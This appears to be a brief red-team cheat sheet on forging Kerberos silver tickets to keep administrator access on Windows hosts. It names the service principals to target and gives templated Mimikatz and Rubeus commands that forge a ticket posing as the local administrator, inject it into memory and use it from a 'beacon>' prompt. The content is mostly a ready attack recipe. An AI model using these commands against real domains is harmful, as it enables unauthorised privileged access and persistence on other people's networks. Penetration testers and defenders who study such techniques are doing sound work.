A silver ticket is a service ticket modified to give privileges to the attacker. It requires the knowledge of the service password (See Kerberoasting); for the purposes of host persisitence, the service will be CIFS/SMB, whose principal is the machine account. For more examples on how to use a silver ticket, see Kerberos Attack: Silver Ticket Edition.

Requirements

Target SPN for persistence method

  • psexec: HOST or CIFS
  • winrm: HOST or HTTP
  • dcsync (DC only): LDAP

Mimikatz

To create a silver ticket via Mimikatz (ironic that the command is called golden):

kerberos::golden /user:ANY_DOMAIN_USER /domain:AD_DOMAIN /sid:DOMAIN_SID /target:TARGET_SPN_DOMAIN /service:TARGET_SPN_PROTOCOL /rc4:SERVICE_NTLM_HASH /ptt
  • DOMAIN_SID is the SID of the domain
    • whoami /user to get current domain user’s SID
    • then remove the last 5 character (-nnnn where n is a number)
  • /rc4: encrypt the service ticket using RC4 and service NTLM password hash
  • /ptt: inject ticket into memory

This will create a ticket that mimics a local administrator (RID 500) in the server with several high-privileged group memberships.

Rubeus

To create a silver ticket via Rubeus:

PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:[target-spn]/[target-host-fqdn] /aes256:[machine-hash-aes256] /user:[target-user] /domain:[domain-fqdn] /sid:[domain-sid] /nowrap

To use a silver ticket:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:[domain] /username:[target-user] /password:[does-not-matter] /ticket:[ticket-b64]